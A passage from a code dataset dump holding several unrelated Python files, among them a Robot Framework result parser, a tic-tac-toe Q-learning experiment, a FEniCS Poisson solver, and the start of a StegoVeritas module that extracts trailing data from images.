sys\nresource_path = \"public/output.xml\"\nexpect_suite = [\"HP888\", \"SCR\"]\n\n### Xpath\ntest_id_xpath = \".//tag[starts-with(.,'DQP')]\"\nid_prefix_xpath = \".//tag[starts-with(.,'')]\"\nsuite_and_test_id_xpath = \"//suite[@name = '']//tag[contains(.,'')]\"\nstart_time_xpath = \"/..//status/@starttime\"\ntest_result_xpath = \"/..//status[contains(@starttime,'')]/@status\"\nall_test_xpath = \".//stat[contains(.,'All Tests')]\"\nduration_xpath = \".//status/@elapsedtime\"\n\n\n\ndef getAllTestIdFromPrefix(xml_url, prefix):\n report_file = open(xml_url, 'r')\n tree = etree.parse(report_file)\n formated_xpath = id_prefix_xpath.replace(\"\", prefix)\n id_list = tree.xpath(formated_xpath)\n return id_list\n\ndef getAllTestResult(xml_url):\n report_file = open(xml_url, 'r')\n tree = etree.parse(report_file)\n all_test_result = tree.xpath(all_test_xpath)\n result_dict = all_test_result[0].attrib\n return result_dict\n\ndef getTestDuration(xml_url):\n report_file = open(xml_url, 'r')\n tree = etree.parse(report_file)\n elapsed_time = tree.xpath(duration_xpath)\n millis = int(elapsed_time[0])\n seconds=(millis/1000)%60\n minutes=(millis/(1000*60))%60\n hours=(millis/(1000*60*60))%24\n return {'seconds': str(int(seconds)), 'minutes': str(int(minutes)), 'hours': str(int(hours))}\n \ndef getAllTestResultFromId(xml_url, suite, id_list):\n \n report_file = open(xml_url, 'r')\n tree = etree.parse(report_file)\n \n suite_result = {}\n for suite in suite:\n # print(suite)\n id_result = {}\n for test_id in id_list:\n \n time_xpath = suite_and_test_id_xpath+start_time_xpath\n expected_xpath = time_xpath.replace(\"\",suite)\n expected_xpath = expected_xpath.replace(\"\",test_id.text)\n # print(expected_xpath)\n list_test_case = tree.xpath(expected_xpath)\n # print(list_test_case)\n \n if len(list_test_case):\n test_result_xpath = suite_and_test_id_xpath+test_result_xpath\n result_xpath = test_result_xpath.replace(\"\",suite)\n result_xpath = result_xpath.replace(\"\",test_id.text)\n result_xpath = result_xpath.replace(\"\",list_test_case[-1]) ### last one\n # print(result_xpath)\n test_result = tree.xpath(result_xpath)\n # print(test_result)\n print(str(test_id.text)+ \" \" + str(test_result[0]))\n # print(list_test_case[0].text)\n id_result[test_id.text]=str(test_result[0])\n suite_result[suite]=id_result\n return suite_result\n\n# id_list = getAllTestIdFromPrefix(resource_path, \"DQP\")\n# test_status = getAllTestResultFromId(resource_path, expect_suite, id_list)\n# key_list = list(test_status) ## วิธีการดึง list ของ dictionary key\n# print(test_status)\n# print(key_list)\n\n# print(getAllTestResult(resource_path))\n# print(getTestDuration(resource_path))","repo_name":"Bond-z/robot_framework","sub_path":"PythonFunction/TestResultUpdate.py","file_name":"TestResultUpdate.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23055447073","text":"from __future__ import annotations\nimport enum\nimport dataclasses\nfrom copy import deepcopy\nfrom typing import Optional, Sequence\nimport random\nfrom xml_parser import XMLModel, Body, geoms, joints\nfrom utils import Transform\nfrom grammars import transforms\nimport pydot\nimport numpy as np\nfrom scipy.spatial.transform import Rotation\n\n\n@dataclasses.dataclass\nclass NodeData():\n symbol: int\n geom: Sequence[Optional[geoms.Geom]] = None\n\n\n@dataclasses.dataclass\nclass EdgeData():\n symbol: int\n transform: Optional[callable] = None\n joint: Sequence[Optional[joint.Joint]] = None\n mirror_x: bool = False\n mirror_y: bool = False\n mirror_z: bool = False\n mirror_first: bool = True\n\n def update(self, data: EdgeData):\n self.symbol = data.symbol\n if data.transform is not None:\n self.transform = transforms.compose(data.transform, self.transform)\n if data.joint is not None:\n self.joint = data.joint\n\n\nclass Tree():\n def __init__(self):\n self.nodes = {}\n self.edges = {}\n self.parents = {}\n self._n = 0\n self.root = 0\n\n def add_node(self, node: NodeData):\n self.nodes[self._n] = node\n self.edges[self._n] = {}\n self._n += 1\n return self._n - 1\n\n def add_edge(self, parent: int, child: int, edge: EdgeData):\n self.edges[parent][child] = edge\n self.parents[child] = parent\n\n def insert_subtree(self, node: int, tree: Tree):\n if len(tree.nodes) == 0: # Delete node (i.e. replace it with an empty subtree)\n if node == 0:\n raise ValueError(\"The root node cannot be deleted.\")\n del self.nodes[node]\n del self.edges[node]\n del self.edges[self.parents[node]][node]\n\n else: # Replace node with subtree\n self.nodes[node] = tree.nodes[tree.root]\n\n index_map = {}\n for ind, data in tree.nodes.items():\n if ind == 0:\n self.nodes[node] = tree.nodes[0]\n index_map[0] = node\n else:\n index_map[ind] = self.add_node(data)\n\n for parent, edges in tree.edges.items():\n for child, edge in edges.items():\n self.add_edge(index_map[parent], index_map[child], edge)\n\n def get_node_data(self, ind: int):\n return self.nodes[ind]\n\n def get_children(self, node_ind: int):\n return self.edge_map[node_ind]\n\n def to_networkx(self):\n import networkx as nx\n g = nx.DiGraph()\n for i, node in self.nodes.items():\n g.add_node(i, symbol=node.symbol)\n for child in self.edges[i]:\n g.add_edge(i, child)\n return g\n\n def visualize(self):\n from matplotlib import pyplot as plt\n import networkx as nx\n plt.clf()\n graph = self.to_networkx()\n labels = {i: str(n.symbol.name) for i, n in self.nodes.items()}\n nx.draw(graph, with_labels=True, font_weight='bold', labels=labels)\n plt.show()\n\n\nclass Rule():\n pass\n\n@dataclasses.dataclass\nclass NodeExpansion(Rule):\n symbol: str\n graph: Tree\n description: str\n\n def apply(self, graph: Tree, node_ind: int):\n node = graph.nodes[node_ind]\n if node.symbol != self.symbol:\n raise ValueError(f'Tried to apply a rule acting on symbol {self.symbol.name} to a '\n f'node with symbol {node.symbol.name}')\n graph.insert_subtree(node_ind, deepcopy(self.graph))\n\n def __repr__(self):\n return f'Rule({self.description})'\n\n\n@dataclasses.dataclass\nclass EdgeExpansion(Rule):\n symbol: str\n edge: EdgeData\n description: str\n\n def apply(self, graph: Tree, parent: int, child: int):\n edge = graph.edges[parent][child]\n if edge.symbol != self.symbol:\n raise ValueError(f'Tried to apply a rule acting on {self.symbol} to a node with symbol'\n f' {edge.symbol}')\n\n edge.update(self.edge)\n\n def __repr__(self):\n return f'Rule({self.description})'\n\n\nclass SymbolSet(enum.IntEnum):\n pass\n\n\nclass RuleSet():\n def __init__(self):\n self._rules_by_symbol = {}\n self._rules_by_id = {}\n self._id_by_symbol = {}\n self.non_terminals = set([])\n\n def add_rule(self, rule: Rule):\n if rule.symbol not in self._rules_by_symbol:\n self.non_terminals.add(rule.symbol)\n self._rules_by_symbol[rule.symbol] = []\n self._id_by_symbol[rule.symbol] = []\n self._rules_by_symbol[rule.symbol].append(rule)\n count = self.nrules\n self._rules_by_id[count] = rule\n self._id_by_symbol[rule.symbol].append(count)\n\n def get_rule_by_id(self, ind: int):\n return self._rules_by_id[ind]\n\n def get_rules_by_symbol(self, symbol: int):\n if symbol in self._rules_by_symbol:\n return self._rules_by_symbol[symbol]\n else:\n return []\n\n def get_ids_by_symbol(self, symbol: int):\n if symbol in self._id_by_symbol:\n return self._id_by_symbol[symbol]\n else:\n return []\n\n @property\n def nrules(self):\n return len(self._rules_by_id)\n\n def __getitem__(self, symbol: int):\n return self.get_rules_by_symbol(symbol)\n\n\nclass Grammar():\n def __init__(self, symbols: SymbolSet, rules: RuleSet, initial_graph: Tree):\n self._initial_graph = initial_graph\n self.symbols = symbols\n self.rules = rules\n\n def initialize_graph(self):\n return deepcopy(self._initial_graph)\n\n def get_valid_expansions(self, graph: Tree):\n valid_rules = {}\n for i, node in graph.nodes.items():\n valid_rules[i] = self.rules[node.symbol]\n for parent, children in graph.edges.items():\n for child, edge in children.items():\n valid_rules[(parent, child)] = self.rules[edge.symbol]\n return valid_rules\n\n def contains_non_terminal_symbols(self, graph: Tree):\n for node in graph.nodes.values():\n if node.symbol in self.rules.non_terminals:\n return True\n for children in graph.edges.values():\n for edge in children.values():\n if edge.symbol in self.rules.non_terminals:\n return True\n return False\n\n def get_non_terminal_nodes(self, graph: Tree):\n inds = []\n for i, node in graph.nodes.items():\n if node.symbol in self.rules.non_terminals:\n inds.append(i)\n return inds\n\n def get_non_terminal_edges(self, graph: Tree):\n edges = []\n for parent, children in graph.edges.items():\n for child, edge in children.items():\n if edge.symbol in self.rules.non_terminals:\n edges.append((parent, child))\n return edges\n\n def get_non_terminals(self, graph: Tree):\n return self.get_non_terminal_nodes(graph) + self.get_non_terminal_edges(graph)\n\n def sample(self):\n g = self.initialize_graph()\n while self.contains_non_terminal_symbols(g):\n valid_rules = self.get_valid_expansions(g)\n ind = random.choice(self.get_non_terminals(g))\n rule = random.choice(valid_rules[ind])\n if isinstance(ind, tuple):\n rule.apply(g, *ind)\n else:\n rule.apply(g, ind)\n return g\n\n def to_xml(self, graph: Tree, filename: str = None):\n if self.contains_non_terminal_symbols(graph):\n raise ValueError('Input graph must contain only terminal symbols in order '\n 'to generate an xml file.')\n xml = to_xml(graph)\n if filename is not None:\n xml.write(filename)\n return xml\n\n\ndef to_xml(graph: Tree):\n xml = XMLModel()\n root = xml.root\n\n default_transform = transforms.apply(Transform()) # identity\n\n class MirrorContext():\n def __init__(self):\n self.mirror_axes = []\n self.is_first = False\n\n def add_mirror(self, axis: int, mirror_first=True):\n self.mirror_axes.append(axis)\n self.is_first = True\n self.mirror_first = mirror_first\n return self\n\n def adjust_geom(self, geom: Sequence[geoms.Geom]):\n out = []\n for g in geom:\n for ax in reversed(self.mirror_axes):\n if self.is_first and not self.mirror_first:\n continue\n else:\n g = g.mirror(ax)\n out.append(g)\n self.is_first = False\n return out\n\n def adjust_joint(self, joint: Sequence[joints.Joint]):\n out = []\n for j in joint:\n for ax in reversed(self.mirror_axes):\n j = j.mirror(ax)\n out.append(j)\n return out\n\n def adjust_transform(self, t: Transform):\n axis_angle = Rotation.from_quat(t.quat).as_rotvec()\n if np.allclose(axis_angle, 0.):\n return t\n for ax in reversed(self.mirror_axes):\n for ind in range(3):\n if ind != ax:\n axis_angle[ind] *= -1\n return Transform(t.pos, Rotation.from_rotvec(axis_angle).as_quat())\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, traceback):\n self.mirror_axes.pop()\n\n mirror = MirrorContext()\n\n\n def add_child_body(body, child_ind, geom, edge):\n transform = default_transform if edge.transform is None else edge.transform\n t = transform(mirror.adjust_geom(geom))\n t = mirror.adjust_transform(t)\n child_body = body.add_body(pos=t.pos, quat=t.quat)\n for j in mirror.adjust_joint(edge.joint):\n if not isinstance(j, joints.RigidJoint):\n child_body.add_joint(j)\n depth_first_traversal(child_ind, child_body)\n\n\n def depth_first_traversal(node_ind: int, body: Body):\n node = graph.nodes[node_ind]\n gs = mirror.adjust_geom(node.geom)\n for g in gs:\n body.add_geom(g)\n for child_ind, edge in graph.edges[node_ind].items():\n if edge.joint is None:\n raise ValueError(\"All edges must specify a joint to connect bodies.\")\n\n add_child_body(body, child_ind, node.geom, edge)\n if edge.mirror_x:\n with mirror.add_mirror(0, edge.mirror_first):\n add_child_body(body, child_ind, node.geom, edge)\n if edge.mirror_y:\n with mirror.add_mirror(1, edge.mirror_first):\n add_child_body(body, child_ind, node.geom, edge)\n if edge.mirror_z:\n with mirror.add_mirror(2, edge.mirror_first):\n add_child_body(body, child_ind, node.geom, edge)\n\n depth_first_traversal(0, root)\n xml.adjust_root()\n return xml\n","repo_name":"cbschaff/nlimb2","sub_path":"packages/grammars/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":11066,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"} +{"seq_id":"4584325348","text":"dodo = 'Os atributos dos monstros vao ser inteligencia, sabedoria...'\nleo = \"Iron Maiden's gonna get you, no matter how far!\"\npepper = 'Urano perdeu algo muito precioso...'\nempate = 'Putz vei, o Leo ta demorando muito pra jogar...'\nmsgs = {'dodo': dodo, 'leo': leo, 'pepper': pepper}\n\ndef jogo(j1, j2, j3):\n jogo_dict = {'pedra': 'tesoura', 'papel': 'pedra', 'tesoura': 'papel'}\n vencedores = []\n jogadas = [j1, j2, j3]\n jogadores = ['dodo', 'leo', 'pepper']\n for i, jogada1 in enumerate(jogadas):\n jogadas_restantes = jogadas.copy()\n del jogadas_restantes[i]\n for jogada2 in jogadas_restantes:\n if jogo_dict[jogada1] == jogada2:\n vencedores.append(jogadores[i])\n return list(set(vencedores))\n\nwhile True:\n try:\n d, l, p = [i for i in input().split()]\n resultado = jogo(d, l, p)\n if len(resultado) == 0 or len(resultado) > 1:\n print(empate)\n else:\n print(msgs[resultado[0]])\n except EOFError:\n break\n","repo_name":"jpsalviano/uri-online-judge","sub_path":"2626.py","file_name":"2626.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71416403564","text":"#!/usr/bin/env python3\n\nimport time\nfrom trilobot import Trilobot\n\n\"\"\"\nThis example will demonstrate the RGB underlights of Trilobot,\nby making them flash in a red, green and blue sequence.\n\"\"\"\nprint(\"Trilobot Example: Flash Underlights\\n\")\n\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\n\n# LED flashing variables\nled_state = False\nflash_interval = 0.5 # in seconds\n\nLOOPS = 10 # How many times to play the LED animation\ninterval = 0.5 # Control the speed of the LED animation\n\ntbot = Trilobot()\n\nlast_time = time.time()\n\nled = False\n\nwhile True:\n print(last_time, led)\n current_time = time.time()\n print(current_time - last_time)\n\n # If enough time has passed since the last change, consider it stable\n if(current_time - last_time) >= interval:\n if led == True:\n tbot.clear_underlighting()\n led = False\n print(\"OFF\")\n last_time = time.time()\n else:\n tbot.fill_underlighting(RED)\n led = True\n print(\"ON\")\n last_time = time.time()","repo_name":"LCAS/ROB1002","sub_path":"scripts/flash_underlights_v2.py","file_name":"flash_underlights_v2.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16005352332","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom Game import *\n\n\n# ## Rules of the Game\n\n# In[2]:\n\n\ndef initial_state():\n board=Board(3,3)\n board.pieces=['.','X','O']\n return board\n\ndef show_state(state):\n print(state)\n \ndef valid_moves(state,player): # returns a list of all of the possible moves given a state\n moves=[]\n \n for i in range(9):\n if state[i]==0:\n moves.append(i)\n \n return moves\n \ndef update_state(state,player,move):\n \n new_state=state\n state[move]=player\n \n return new_state\n\ndef win_status(state,player):\n # \"win\" if the player wins\n # \"lose\" if the player loses\n # \"stalemate\" if a tie\n # None if the game continues\n \n # 0 1 2\n # 3 4 5\n # 6 7 8\n \n if state[0]==player and state[1]==player and state[2]==player:\n return \"win\"\n if state[3]==player and state[4]==player and state[5]==player:\n return \"win\"\n if state[6]==player and state[7]==player and state[8]==player:\n return \"win\"\n if state[0]==player and state[3]==player and state[6]==player:\n return \"win\"\n if state[1]==player and state[4]==player and state[7]==player:\n return \"win\"\n if state[2]==player and state[5]==player and state[8]==player:\n return \"win\"\n if state[0]==player and state[4]==player and state[8]==player:\n return \"win\"\n if state[6]==player and state[4]==player and state[2]==player:\n return \"win\"\n \n if player==1:\n other_player=2\n else:\n other_player=1\n \n \n if not valid_moves(state,other_player):\n return \"stalemate\"\n \n \n return None\n \n\n\n# ## Agents\n\n# In[3]:\n\n\ndef human_move(state,player):\n print(\"\"\"\n 0 1 2\n 3 4 5\n 6 7 8\n \"\"\")\n \n move=int(input(\"What move?\"))\n \n return move\n\nhuman_agent=Agent(human_move)\n\n\n# In[4]:\n\n\ndef random_move(state,player):\n possible_moves=valid_moves(state,player)\n move=random.choice(possible_moves)\n return move\n\n\nrandom_agent=Agent(random_move)\n\n\n# In[12]:\n\n\nfrom Game.minimax import *\ndef minimax_move(state,player):\n\n values,moves=minimax_values(state,player,display=False)\n return top_choice(moves,values)\n\n\nminimax_agent=Agent(minimax_move)\n\n\n# In[6]:\n\n\ndef skittles_move(state,player,info):\n S=info.S\n last_action=info.last_action\n last_state=info.last_state\n \n \n # if Ive never seen this state before\n if not state in S:\n actions=valid_moves(state,player)\n\n S[state]=Table()\n for action in actions:\n S[state][action]=3 \n \n move=weighted_choice(S[state]) # weighted across actions\n \n # what if there are no skittles for a particular state?\n # move is None in that case\n \n if move is None:\n # learn a little bit\n if last_state:\n S[last_state][last_action]=S[last_state][last_action]-1\n if S[last_state][last_action]<0:\n S[last_state][last_action]=0\n \n move=random_move(state,player)\n \n return move\n\ndef skittles_after(status,player,info):\n S=info.S\n last_action=info.last_action\n last_state=info.last_state\n\n if status=='lose':\n # learn a little bit\n S[last_state][last_action]=S[last_state][last_action]-1\n if S[last_state][last_action]<0:\n S[last_state][last_action]=0\n \n \n\n\nskittles_agent=Agent(skittles_move)\nskittles_agent.S=Table()\nskittles_agent.post=skittles_after\n\n\nskittles_agent2=Agent(skittles_move)\nskittles_agent2.S=Table()\nskittles_agent2.post=skittles_after\n\n\n# In[7]:\n\n\ndef Q_move(state,player,info):\n Q=info.Q\n last_action=info.last_action\n last_state=info.last_state\n \n α=info.α\n γ=info.γ\n ϵ=info.ϵ\n \n\n # if Ive never seen this state before\n if not state in Q:\n actions=valid_moves(state,player)\n\n Q[state]=Table()\n for action in actions:\n Q[state][action]=0 \n \n # deal with random vs top choice here\n if random.random()<ϵ:\n move=random_move(state,player) \n else:\n move=top_choice(Q[state]) \n \n # what if there are no skittles for a particular state?\n # move is None in that case\n \n if not last_action is None: # not the first move\n # learn a little bit\n # change equation here\n reward=0\n \n # Bellman equation\n Q[last_state][last_action] += α*(reward+\n γ*max([Q[state][a] for a in Q[state]]) - \n Q[last_state][last_action])\n \n \n \n return move\n\ndef Q_after(status,player,info):\n Q=info.Q\n last_action=info.last_action\n last_state=info.last_state\n\n α=info.α\n γ=info.γ\n ϵ=info.ϵ\n \n if status=='lose':\n reward=-1\n elif status=='win':\n reward=1\n elif status=='stalemate':\n reward=0.5\n else:\n reward=0\n \n # learn a little bit\n Q[last_state][last_action] += α*(reward-Q[last_state][last_action])\n \n\n\n# In[15]:\n\n\nQ1_agent=Agent(Q_move)\nQ1_agent.Q=LoadTable('Q1_TTT_data.json')\nQ1_agent.post=Q_after\n\nQ1_agent.α=0.3 # learning rate\nQ1_agent.γ=0.9 # memory constant, discount factor\nQ1_agent.ϵ=0.1 # probability of a random move during learning\n\nQ2_agent=Agent(Q_move)\nQ2_agent.Q=LoadTable('Q2_TTT_data.json')\nQ2_agent.post=Q_after\n\nQ2_agent.α=0.3 # learning rate\nQ2_agent.γ=0.9 # memory constant, discount factor\nQ2_agent.ϵ=0.1 # probability of a random move during learning\n\n\n# In[23]:\n\n\ntotal_number_of_games=0\nfor epoch in range(100):\n \n number_training_games=1000\n number_of_testing_games=10\n \n #=================\n # traning cycle\n Q1_agent.α=0.3 # learning rate\n Q1_agent.ϵ=0.1 # probability of a random move during learning\n Q2_agent.α=0.3 # learning rate\n Q2_agent.ϵ=0.1 # probability of a random move during learning\n \n g=Game(number_training_games)\n g.display=False\n g.run(Q1_agent,Q2_agent)\n\n #=================\n # testing cycle\n Q1_agent.α=0.0 # learning rate\n Q1_agent.ϵ=0.0 # probability of a random move during learning\n Q2_agent.α=0.0 # learning rate\n Q2_agent.ϵ=0.0 # probability of a random move during learning\n \n \n g=Game(number_of_testing_games)\n g.display=False\n result=g.run(Q1_agent,Q2_agent)\n \n total_number_of_games+=number_training_games\n win_percentage=sum([r==1 for r in result])/number_training_games*100\n loss_percentage=sum([r==2 for r in result])/number_training_games*100\n tie_percentage=sum([r==0 for r in result])/number_training_games*100\n\n print(total_number_of_games,\":\",win_percentage,\" \",end=\"\")\n \n SaveTable(Q1_agent.Q,'Q1_TTT_data.json')\n SaveTable(Q2_agent.Q,'Q2_TTT_data.json') \n \n\n\n# In[24]:\n\n\ng=Game(number_of_testing_games)\ng.display=False\nresult=g.run(minimax_agent,Q2_agent)\n\n\n# In[25]:\n\n\ng.report()\n\n\n# In[26]:\n\n\ng=Game(number_of_testing_games)\ng.display=False\nresult=g.run(Q1_agent,minimax_agent)\n\n\n# In[27]:\n\n\ng.report()\n\n\n# ## After 100,000 games, \n# \n# 1. ties 100% with minimax\n# 2. I defeated it with the game below:\n# \n# Game 1\n# . . . \n# . . . \n# . . . \n# \n# \n# 0 1 2\n# 3 4 5\n# 6 7 8\n# \n# What move? 4\n# Player 1 moves 4\n# . . . \n# . X . \n# . . . \n# \n# Player 2 moves 0\n# O . . \n# . X . \n# . . . \n# \n# \n# 0 1 2\n# 3 4 5\n# 6 7 8\n# \n# What move? 1\n# Player 1 moves 1\n# O X . \n# . X . \n# . . . \n# \n# Player 2 moves 7\n# O X . \n# . X . \n# . O . \n# \n# \n# 0 1 2\n# 3 4 5\n# 6 7 8\n# \n# What move? 6\n# Player 1 moves 6\n# O X . \n# . X . \n# X O . \n# \n# Player 2 moves 3\n# O X . \n# O X . \n# X O . \n# \n# \n# 0 1 2\n# 3 4 5\n# 6 7 8\n# \n# What move? 2\n# Player 1 moves 2\n# O X X \n# O X . \n# X O . \n# \n# Player 1 won.\n\n# In[28]:\n\n\ng=Game(1)\nresult=g.run(human_agent,Q2_agent)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"kdoorley/AI-and-Robotics-Fall-2020-Class-Notebooks","sub_path":"Sprint #2 - Learning and Simulation/2020-09-14 - TTT Q Learning Minimax and Skittles.py","file_name":"2020-09-14 - TTT Q Learning Minimax and Skittles.py","file_ext":"py","file_size_in_byte":8142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22905393323","text":"\"\"\"\nFEniCS tutorial demo program: Poisson equation with Dirichlet conditions.\nTest problem is chosen to give an exact solution at all nodes of the mesh.\n -Laplace(u) = f in the unit square\n u = u_D on the boundary\n u_D = 1 + x^2 + 2y^2\n f = -6\n\"\"\"\n\nfrom __future__ import print_function\nfrom fenics import *\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits import mplot3d\n\n# Create mesh and define function space\nmesh = UnitSquareMesh(8, 8)\nV = FunctionSpace(mesh, 'P', 1)\n\n# Define boundary condition\nu_D = Expression('1 + x[0]*x[0] + 2*x[1]*x[1]', degree=2)\n\ndef boundary(x, on_boundary):\n return on_boundary\n\nbc = DirichletBC(V, u_D, boundary)\n\n# Define variational problem\nu = TrialFunction(V)\nv = TestFunction(V)\nf = Constant(-6.0)\na = dot(grad(u), grad(v))*dx\nL = f*v*dx\n\n# Compute solution\nu = Function(V)\nsolve(a == L, u, bc)\n\n# Plot solution and mesh\nfig = plt.figure()\nfig.show()\nfig.clear()\nax = fig.add_subplot(121,projection='3d')\np = plot(u,mode=\"warp\", title='Temperature Field (axes dimension in mm)')\n#m = plot(mesh)\n#fig.gca().set_zlim((0, 2))\nax.set(title='Poisson Equation')\nfig.colorbar(p)\n#ax.clear()\nax2 = fig.add_subplot(122)\nax2.plot([1,2,3],[1,3,4])\nfig.canvas.draw()\n\n# Save solution to file in VTK format\n# vtkfile = File('poisson/solution.pvd')\n# vtkfile << u\n\n# Compute error in L2 norm\n# error_L2 = errornorm(u_D, u, 'L2')\n\n# Compute maximum error at vertices\nvertex_values_u_D = u_D.compute_vertex_values(mesh)\nvertex_values_u = u.compute_vertex_values(mesh)\nimport numpy as np\n# error_max = np.max(np.abs(vertex_values_u_D - vertex_values_u))\n\n# Print errors\n# print('error_L2 =', error_L2)\n# print('error_max =', error_max)\n\n'''mshco = mesh.coordinates()\nx = mshco[:,0]\ny = mshco[:,1]\nfig = plt.figure()\nax = fig.add_subplot(1,1,1,projection = '3d')\nsca = ax.plot_trisurf(x,y,vertex_values_u,cmap=plt.cm.jet)\n'''\n# Hold plot\nplt.show()","repo_name":"Madhav-Joshi/Fenics_Project","sub_path":"fenics_trial/poisson_eq.py","file_name":"poisson_eq.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10356099638","text":"from random import randint\n\nvet_estado = ['limpo', 'sujo']\n\nordem = int(input(\"Entre com a ordem da matriz: \\n\"))\n\nposicao_sala = [i for i in range(0, ordem*ordem)]\nprint(posicao_sala)\n\nmat = []\nfor i in range(0, ordem):\n mat.append([])\nprint(mat)\n\n\nsala_estado = 0\np = 0\n\nfor i in range(0, ordem):\n for j in range(0, ordem):\n sala = \"sala\" + str(posicao_sala[p])\n sala_estado = vet_estado[randint(0, 1)]\n dic = {sala: {\"estado\": sala_estado, \"robo\": False}}\n mat[i].append(dic)\n p += 1\n\n\nfor i in range(0, ordem):\n for j in range(0, ordem):\n print(f\"{mat[i][j]} \", end='')\n print()\n\n# print(mat[0][0].get('sala0').get('estado'))\np = 0\n\nmat[0][0]['sala0']['robo'] = True\n\nfor i in range(0, ordem):\n for j in range(0, ordem):\n\n sala = \"sala\" + str(posicao_sala[p])\n\n if mat[i][j].get(sala).get('estado') == 'limpo':\n print(f'A sala {sala} está limpa! \\n')\n mat[i][j][sala]['robo'] = False\n if 1 + j < ordem:\n print(f'O robo está indo para a sala{p+1} \\n')\n mat[i][1 + j][f\"sala{p+1}\"]['robo'] = True\n elif 1 + i < ordem:\n mat[1 + i][0][f'sala{p+1}']['robo'] = True\n elif i == j:\n print('Robo voltando para a sala0.\\n')\n mat[0][0]['sala0']['robo'] = True\n\n elif mat[i][j].get(sala).get('estado') == 'sujo':\n print(f'A sala {sala} está suja! \\n')\n print(f'O robo está limpando!\\n')\n mat[i][j][sala]['estado'] = 'limpo'\n print(f'Sala limpa!')\n mat[i][j][sala]['robo'] = False\n if 1 + j < ordem:\n print(f'O robo está indo para a sala{p + 1} \\n')\n mat[i][j + 1][f'sala{p+1}']['robo'] = True\n elif 1 + i < ordem:\n mat[i + 1][0][f'sala{p+1}']['robo'] = True\n elif i == j:\n print('Robo voltando para a sala0 \\n')\n mat[0][0]['sala0']['robo'] = True\n\n p += 1\n\n\np = 0\nfor i in range(0, ordem):\n for j in range(0, ordem):\n sala = \"sala\" + str(posicao_sala[p])\n p += 1\n print(f'{mat[i][j][sala][\"estado\"], mat[i][j][sala][\"robo\"]} ', end='')\n\n print()\n\n\n","repo_name":"DLuizBM/Contents","sub_path":"Python/ExerciciosColecoes/aspirador.py","file_name":"aspirador.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18586700542","text":"from pathlib import Path\n\n\"\"\"\nWrite a while loop that prompts users for their name. \nCollect all the names that are entered, and then write these names to a file called guest_book.txt. \nMake sure each entry appears on a new line in the file.\n\"\"\"\n\npath = Path('guests_book.txt')\nguests = ''\nask_for_name = True\n\nwhile ask_for_name:\n guest = f\"{' '.join(input('What is your name? Enter q to quit. ').split()).title()}\\n\"\n\n if guest.replace('\\n', '') == 'Q':\n ask_for_name = False\n else:\n guests += guest\npath.write_text(guests)\n","repo_name":"Iskanderrus/PythonFromScratch","sub_path":"Code Samples/Chapter 10/guests_book_writer.py","file_name":"guests_book_writer.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20195032784","text":"__author__ = 'oahayder'\n\nfrom django.conf.urls import patterns, url, include\nfrom proximitysearch import views\n\nurlpatterns = patterns('',\n # ex: /proximitysearch/nearby/35.5555/120.99999\n url(r'^nearby/(?P\\-?\\d+\\.?\\d*)/(?P\\-?\\d+\\.?\\d*)/$', views.NearbyFoodFacilityList.as_view(), name='nearby'),\n url(r'^api-docs/', include('rest_framework_swagger.urls')),\n)\n","repo_name":"oahayder/feedme","sub_path":"feedme/proximitysearch/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71386925162","text":"\nimport logging\nlogger = logging.getLogger('StegoVeritas:Modules:Image:Analysis:Trailing')\n\nimport os\nfrom struct import unpack\nfrom .. import png\nfrom ..gif import gif as gif_module\n\ndef run(image):\n \"\"\"Extracts trailing data from the image.\n\n Args:\n image: SVImage class instance\n\n Returns:\n None\n\n Saves the result to RESULTSDIR/trailing_data.bin\n \"\"\"\n\n global output_file\n output_file = os.path.join(image.veritas.results_directory, \"trailing_data.bin\")\n\n args = image.veritas.args\n\n # Nothing to do\n if not args.auto and not args.trailing:\n logger.debug('Nothing to do.')\n return\n\n try:\n if image.file.format == \"JPEG\":\n jpeg(image)\n elif image.file.format == \"TIFF\":\n tiff(image)\n elif image.file.format == \"PNG\":\n png(image)\n elif image.file.format == \"BMP\":\n bmp(image)\n elif image.file.format == \"GIF\":\n gif(image)\n else:\n print(\"Image Trailing: No support yet for format {0}\".format(image.file.format))\n return\n except Exception as e:\n print(\"Image Trailing: Something went wrong... please submit a bug report. Error: {}\".format(e))\n\n\ndef gif(image):\n \n # Load up the gif\n g = gif_module(fileName=image.veritas.file_name)\n \n # Parse it\n g.parse()\n \n # Check for excess info\n if len(g.gif) > 0:\n print(\"Discovered trailing data: {0}\".format(g.gif))\n with open(output_file, \"wb\") as outFile:\n outFile.write(g.gif)\n\n\ndef png(image):\n pngFile = open(image.veritas.file_name,\"rb\").read()\n \n # TODO: This isn't 100% accurate. Rework to follow tags correctly.\n pngFile = pngFile.split(b\"IEND\")[1][4:]\n \n if len(pngFile) != 0:\n print(\"Discovered Trailing Data:\\n{0}\".format(pngFile))\n with open(output_file,\"wb\") as outFile:\n outFile.write(pngFile)\n\n\ndef bmp(image):\n # This one is pretty easy\n myBMP = open(image.veritas.file_name,\"rb\").read()\n \n size = unpack(\"I\"\n fmt_s = \">h\"\n else:\n print(\"Trailing: Error Invalid 